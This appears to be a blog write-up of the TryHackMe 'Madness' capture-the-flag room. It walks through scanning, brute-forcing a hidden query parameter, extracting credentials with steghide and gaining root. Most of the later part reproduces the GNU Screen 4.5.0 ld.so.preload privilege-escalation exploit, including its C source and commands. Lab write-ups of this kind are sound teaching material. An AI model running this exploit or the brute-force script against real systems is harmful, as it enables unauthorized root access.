Having fun with TryHackMe again. So, here is the write up and guideline to pass this Madness challenge.

Room: https://tryhackme.com/room/madness
Level: Easy

Task: Use your skills to access the user and root account!

As usual, open the IP in the browser and do NMAP also

# nmap -T4 -A -sV 10.10.196.75
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ac:f9:85:10:52:65:6e:17:f5:1c:34:e7:d8:64:67:b1 (RSA)
| 256 dd:8e:5a:ec:b1:95:cd:dc:4d:01:b3:fe:5f:4e:12:c1 (ECDSA)
|_ 256 e9:ed:e3:eb:58:77:3b:00:5e:3a:f5:24:d8:58:34:8e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There is 2 port open SSH and HTTP. Never mind. We can look back again. So, proceed to the webpage. There is nothing suspicious string in this page except the dead link on top. Lets see the code

Okay now, there is a hint there. Might be related to the dead link. So, lets download it.

# wget http://10.10.X.X/thm.jpg
# cat thm.jpg
PNG
...

Its wrong format. I tried to rename its not working. For quite some time searching for solution, I found there is problem with file header. I’m refering here to fix the header https://www.file-recovery.com/jpg-signature-format.htm

# hexeditor thm.jpg

Fix the first line according to the jpg signature and save

The image show hint to the hidden directory. Lets open it in browser

Just dead end. Its say to guess his secret. “Secret Entered” is suspicious there. Where is the input??

Lets see gobuster first

# gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.196.X/th1s_1s_h1dd3n/ -t 40
..
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
..

Still no luck. Might be query string? but what query string is used? So I’m using Arjun tools to brute query string available in this page

# arjun -u http://10.10.196.X/th1s_1s_h1dd3n/index.php
[*] Probing the target for stability
[*] Analysing HTTP response for anamolies
[*] Analysing HTTP response for potential parameter names
[*] Logicforcing the URL endpoint
[✓] name: secret, factor: body length

Ok now it make sense. The hint shows the “secret” parameter only in range 0–99. Lets create simple python code

def main(secret):
req = requests.get(url="http://URL", params={"secret": secret})
print(req.url)
if "That is wrong" not in str(req.content):
print(req.content)
exit(1)


if __name__ == '__main__':
for x in range(0, 99):
try :
main(x)
except KeyboardInterrupt:
exit(1)

Got the secret: y2RPJ4QaPXXX. Hmm.. But what for?? Try to decode first using Cyberchef but no luck. So which secret is this? I think its related to the images

Lets try this image first using steghide, without and with secret code earlier

# steghide extract -sf madness.jpg
Enter passphrase:
wrote extracted data to "password.txt".
# cat password.txt
I didn't think you'd find me! Congratulations!
Here take my password*axA&GFXXX

Wait what? LOL..

This image actually contain secret password in it.. okay, save it for later then. Then no need to try with this secret code (y2RPJ4QaPXXX).

Lets try another image (binary look image).

# steghide extract -sf ~/Pictures/thm.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!

Without secret code failed,

# steghide extract -sf ~/Pictures/thm.jpg
Enter passphrase:
wrote extracted data to "hidden.txt".
# cat hidden.txt
Fine you found the password!
Here's a usernamewbxXXI didn't say I would make it easy for you!

Ok now, the username is found! It might be related to the password in the “madness” image. I think we found the SSH credentials. Lets try

# ssh wbxxx@10.10.X.X
wbxxx@10.10.X.X's password:
Permission denied, please try again.

Sh*t what happen? The hint says something with “ROT with this name”. Okay now understand, using Cyberchef to get the real username

# ssh joxxx@10.10.X.X
joxxx@10.10.X.X's password:
joxxx@ubuntu:~$

Okay yes, success to gain access into the user. Now the user flag is found! Time for the root.

Check if any running in crontab

# crontab -e
# cat /etc/crontab

Not luck here. “This room is part of the Turmoil series”. So lets see we can find any word with turmoil in this server

# grep -rs "turmoil" /

Also no luck.

# uname -a
Linux ubuntu 4.4.0-170-generic #199-Ubuntu SMP Thu Nov 14 01:45:04 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

There is no vulnerability recorded in exploitdb.

jokxx@ubuntu:~$ perl linux-exploit.pl#############################
Linux Exploit Suggester 2
#############################
Local Kernel: 4.4.0
Searching 72 exploits...
Possible Exploits
[1] af_packet
CVE-2016-8655
Source: http://www.exploit-db.com/exploits/40871
[2] dirty_cow
CVE-2016-5195
Source: http://www.exploit-db.com/exploits/40616
[3] exploit_x
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[4] get_rekt
CVE-2017-16695
Source: http://www.exploit-db.com/exploits/45010

Tried all of them. Not working 😅 The newer version already fix it. Browsing the folders what can be done right now… After 4 hours….

# ls -al /bin
....
lrwxrwxrwx 1 root root 12 Jan 4 2020 screen -> screen-4.5.0
-rwsr-xr-x 1 root root 1588648 Jan 4 2020 screen-4.5.0
-rwsr-xr-x 1 root root 1588648 Jan 4 2020 screen-4.5.0.old
lrwxrwxrwx 1 root root 12 Jan 4 2020 screen.old -> screen-4.5.0
....

Found something that, the gnu screen application has been replace. Googling the gnu screen, found exploit for that version. https://www.exploit-db.com/exploits/41154

So, follow the scripts step. Create 2 file libhax.c and rootshell.c

$ cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF
$ cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF

Then, run following command,

# gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
# rm -f /tmp/libhax.c
# gcc -o /tmp/rootshell /tmp/rootshell.c
# rm -f /tmp/rootshell.c
# cd /etc
# umask 000
# screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
# screen -ls
# /tmp/rootshell
#

Now, we offically root!!!

# cat /root/root.txt
THM{5ecd98aa66a6abb670184d7547XXXXX}

Done!!! Its harder than I expected. LOL

Software Engineer at Teratotech.com

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store